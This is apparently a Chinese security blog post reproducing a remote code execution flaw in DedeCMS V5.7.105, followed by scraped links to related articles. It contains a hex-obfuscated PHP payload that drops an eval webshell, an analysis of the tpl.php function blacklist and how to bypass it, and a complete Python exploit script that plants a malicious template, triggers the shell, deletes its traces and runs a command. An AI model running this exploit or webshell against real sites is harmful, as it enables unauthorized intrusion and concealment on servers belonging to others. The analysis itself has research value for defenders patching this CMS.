前言

原文链接:https://mp.weixin.qq.com/s/bwBc4I9GeY6M_WlEDx83TA

复现记录时间:

下载当前最新版本DedeCMS V5.7.105进行漏洞复现以及漏洞分析

漏洞复现

可以自己在本地搭建漏洞环境,也可以拉取我自己制作的docker镜像

docker pull se1zer/dedecms:latest

docker run -d -P se1zer/dedecms

不会给镜像做瘦身,正在学了,555,要是拉取的太慢可以挂到后台或者就自己本地搭一下吧

首先需要到后台登录界面/uploads/dede/登录到后台,然后如下图操作创建一个模板

这里模板内容需要做绕过,详情看后边的漏洞分析

<?php

"\x66\x69\x6c\x65\x5f\x70\x75\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"('./shell.php', "<?php eva" . "l(\$_GE" . "T[a]);");

// file_put_contents('./shell.php', "<?php eval($_GET[a]);");

第二步,如下图增加一个页面

通过刚刚新建的模板进行新建页面,需要注意的是这里文件名处后缀为.php

之后便在/uploads/a/下创建了一个文件,访问/uploads/a/123.php页面将会执行自己写的file_put_contents函数生成一个shell.php

漏洞分析

通过刚才漏洞复现的接口,可以看到创建模板调用的是tpl.php文件,新建页面调用的是templets_one_add.php文件

tpl.php

文件位于/uploads/dede/tpl.php

在31行这里,对模板内容进行了一些过滤和检测,下边使用注释进行解释过滤

// 不允许这些字符

$content = preg_replace("#(/\*)[\s\S]*(\*/)#i", '', $content);

// 黑名单正则匹配

global $cfg_disable_funs;

$cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';

$cfg_disable_funs = $cfg_disable_funs.',[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,create_function,array_map,call_user_func,call_user_func_array,array_filert';

foreach (explode(",", $cfg_disable_funs) as $value) {

    $value = str_replace(" ", "", $value);

    // [^a-z]+ 是除a-z之外的字符(在[]里不是开头的意思)

    if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{]#i", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

}

// 匹配<\?php头

if(preg_match("#^[\s\S]+<\?(php|=)?[\s]+#i", " {$content}") == TRUE) {

    // 这里的U为惰性匹配

    // 匹配函数变量执行,例如$a="phpinfo",则$a()就会被匹配

    if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

    // 就是在上一个匹配前加了一个@,防止报错

    if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

    // 匹配反引号`,防止命令执行

    if(preg_match("#[`][\s\S]*[`]#i", " {$content}") == TRUE) {

        $content = dede_htmlspecialchars($content);

        die("DedeCMS提示:当前页面中存在恶意代码!<pre>{$content}</pre>");

    }

}

通过上述梳理,发现有很多方法是可以绕过的!

之后进入$action == 'saveedit'语句,然后写入文件,这里模板文件必须使用.htm结尾

templets_one_add.php

前边都是对新建页面内容的一些处理,不会影响模板内容引入,在43行处开始保存文件

来到uploads/include/arc.sgpage.class.phpSavaToHtml方法

然后进入uploads/include/dedetag.class.phpSaveTo方法

798行获取模板内容,如果有标签的话,还会把标签的值写入文件

至此分析完毕

总结:代码没有对新建页面的文件后缀进行检测,并且模板内容安全检测也不够完善从而导致了这个漏洞的产生

EXP

import requests

from urllib.parse import urljoin

import re

cookies = {

    "PHPSESSID": "5k3br9fh4f34so2k0k85qqg3f5"

}

headers = {

    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36",

}

s = requests.session()

s.headers.update(headers)

s.cookies.update(cookies)

def exp(url):

    # 创建恶意模板

    tpl_url = urljoin(url, "dede/tpl.php")

    ## 获取token

    params="action=newfile&acdir=default"

    r = s.get(tpl_url, params=params)

    token = re.search('"token" value="([a-z0-9]{32})"', r.text).group(1)

    # print(token)

    shell = """<?php

    "\\x66\\x69\\x6c\\x65\\x5f\\x70\\x75\\x74\\x5f\\x63\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x73"('./shell.php', "<?php eva" . "l(\$_POS" . "T[a]);");

    """

    data = {

        "action": "saveedit",

        "acdir": "default",

        "token": token,

        "filename": "hack.htm",

        "content": shell

    }

    r = s.post(tpl_url, data=data)

    if "成功" in r.text:

        print("成功创建模板")

    # 利用恶意模板新建页面

    templets_url = urljoin(url, "dede/templets_one_add.php")

    data = {

        "dopost": "save",

        "title": "hack",

        "keywords": "hack",

        "description": "hack",

        "likeidsel": "default",

        "nfilename": "/a/hack.php",

        "template": "{style}/hack.htm",

        "ismake": 0,

        "body": ""

    }

    r = s.post(templets_url, data=data)

    if "成功" in r.text:

        print("成功增加页面")

    s.get(urljoin(url, "a/hack.php"))

    # 清理痕迹

    ## 获取aid

    r = s.get(urljoin(url, "dede/templets_one.php"))

    aid = re.search("'templets_one_edit.php\?aid=([0-9]+)&dopost=edit'>hack", r.text).group(1)

    ## 删除页面

    params = f"aid={aid}&dopost=delete"

    r = s.get(urljoin(url, "dede/templets_one_edit.php"), params=params)

    if "成功" in r.text:

        print("成功删除页面")

    ## 删除恶意模板

    params = "action=del&acdir=default&filename=hack.htm"

    r = s.get(tpl_url, params=params)

    if "成功" in r.text:

        print("成功删除模板")

    shell_url = urljoin(url, "a/shell.php")

    print("shell地址: " + shell_url)

    print("shell密钥为a")

    r = s.post(shell_url, data={"a":"system('whoami');"})

    print("whoami命令执行结果: " + r.text)

if __name__ == "__main__":

    url = "http://phpstorm.com/DedeCMS-V5.7.105-UTF8/uploads/"

    exp(url)

登录后台后,手动修改脚本中的cookie和网站根目录,运行脚本即可获得shell地址及密码

织梦DedeCMS 0day RCE的更多相关文章

  1. 织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

    漏洞版本: Dedecms 5.5 漏洞描述: 漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认 ...

  2. 织梦Dedecms使用Nginx的安全设置

    首先需要说明的是,任何程序都是有漏洞的,我们需要做好一些必要的防范,来减少由于程序漏洞造成的损失.织梦的漏洞多,这个是很多人的想法.不过大家如果做好了织梦系统的文件夹权限什么的设置,很多漏洞也是用不上 ...

  3. 织梦DedeCMS模板防盗的四种方法

    织梦(DedeCMS)模板也是一种财富,不想自己辛辛苦苦做的模板被盗用,在互联网上出现一些和自己一模一样的网站,就需要做好模板防盗.本文是No牛收集整理自网络,不过网上的版本都没有提供 Nginx 3 ...

  4. 织梦Dedecms安全设置

    织梦DedeCMS是一款非常流行的CMS,很多刚开始建站人都用的织梦,一方面是织梦比较容易操作;另一方面是织梦的SEO方面做的确实比其他的系统要好一些.这些都导致织梦的用户群是非常庞大的,用的人多了, ...

  5. 织梦DEDECMS网站后台安全检测提示 加一个开关

    1.进入后台后,点击 系统->系统基本参数->添加变量: 变量名称:cfg_safecheck_switch 变量值:N 变量类型:布尔(Y/N) 参数说明:启用安全监测系统: 2.找到系 ...

  6. 织梦DedeCMS首页调用单页文档内容的方法

    很多使用织梦dedecms单页文档功能的朋友都想知道如何在织梦首页调用单页文档的内容,下面就教大家具体的实现方法: 具体步骤如下: 首先在首页模板需要显示单页文档内容的地方插入如下代码: {dede: ...

  7. 织梦DedeCms调用全站相关文章方法

    织梦DedeCms 有个标签可以调用相关文章,通过下面的修改可以调用全站的相关文章,文章页内显示相关文章内容,可以提高关键词密度,还是挺不错的. 模板调用代码 <div>     < ...

  8. 织梦DedeCms用SQL语句调用数据库任意内容方法

    织梦DedeCms给我们提供了大量调用标签,供我们调用各种数据,但提供再多的标签,也有满足不了我们的时候,这时我们可以用SQL语句,灵活调用我们需要的内容. 如何任意调用数据库中的内容呢?先举个例子: ...

  9. 织梦DedeCms网站更换域名后文章图片路径批量修改

    因为织梦上传图片用的是绝对地址,如果域名更换后,之前发布的文章的图片URL是不会跟着改变的,所以我们需要把旧域名替换成新的域名,方法很简单,有一段SQL语句更新一下文章正文内容就行. 复制下面SQL语 ...

  10. 织梦DedeCms去掉栏目页面包屑导航最后的分隔符“>”

    织梦DedeCms的面包屑导航调用标签{dede:field name=’position’ /},在栏目页里调用的面包屑导航,最后会出现分割符号“>”,如:主页 > DedeCms 模板 ...

随机推荐

  1. ssm 乱码

    1.post乱码:在web.xml中增加解决解决post乱码的过滤器 <!--解决POST乱码问题--> <filter> <filter-name>Charact ...

  2. from 表单非空验证以及多表单提交

    开发中我们常用到$('#formid').serialize()方法进行表单序列化提交,但也相应催生了表单的非空严重以及多表单提交. form html: <form id="form ...

  3. “XZ”格式文件解压

    1.下载xz 官网:https://tukaani.org/xz/ 例:wget https://nchc.dl.sourceforge.net/project/lzmautils/xz-5.2.6. ...

  4. SUPERVISOR监控tomcat配置文件

    Supervisor安装教程参考:https://www.cnblogs.com/brad93/p/16639953.html tomcat安装教程参考:https://www.cnblogs.com ...

  5. ubuntu1804搭建FTP服务器的方法

    搭建FTP服务器 FTP的工作原理: FTP:File Transfer Protocol ,文件传输协议.属于NAS存储的一种协议,基于CS结构. ftp采用的是双端口模式,分为命令端口和数据端口, ...

  6. 微服务组件-----Spring Cloud Alibaba 注册中心Nacos的CP架构Raft协议分析

    前言 本篇幅是继  注册中心Nacos源码分析 的下半部分. 意义 [1]虽说大部分我们采用注册中心的时候考虑的都是AP架构,为什么呢?因为性能相对于CP架构来说更高,需要等待的时间更少[相对于CP架 ...

  7. ArcObjects SDK开发 016 在ArcMap中使用Toolbox

    1.如何找到ToolBox 通过Geoprocessing菜单上的ArcToolbox菜单项,可以打开ArcToolbox面板. 工具栏上也有一个ArcToolbox的按钮,点击该按钮也可以打开. 通 ...

  8. 常用的渗透测试工具——SQLMap安装

    SQLMap是一个自动化的SQL注入工具,其主要功能是扫描.发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL.Qracle.PostgreSQL.Microsoft ...

  9. if多条件判断

    在一个if语句中,括号里面包含多个条件时.条件是否被执行要看if语句里面各个条件是"与"的关系还是"或"的关系. #include<stdio.h> ...

  10. 【转载】WebBrowser控件的常用方法、属性和事件

    1. 属性 属性 说明 Application 如果该对象有效,则返回掌管WebBrowser控件的应用程序实现的自动化对象(IDispatch).如果在宿主对象中自动化对象无效,这个程序将返回Web ...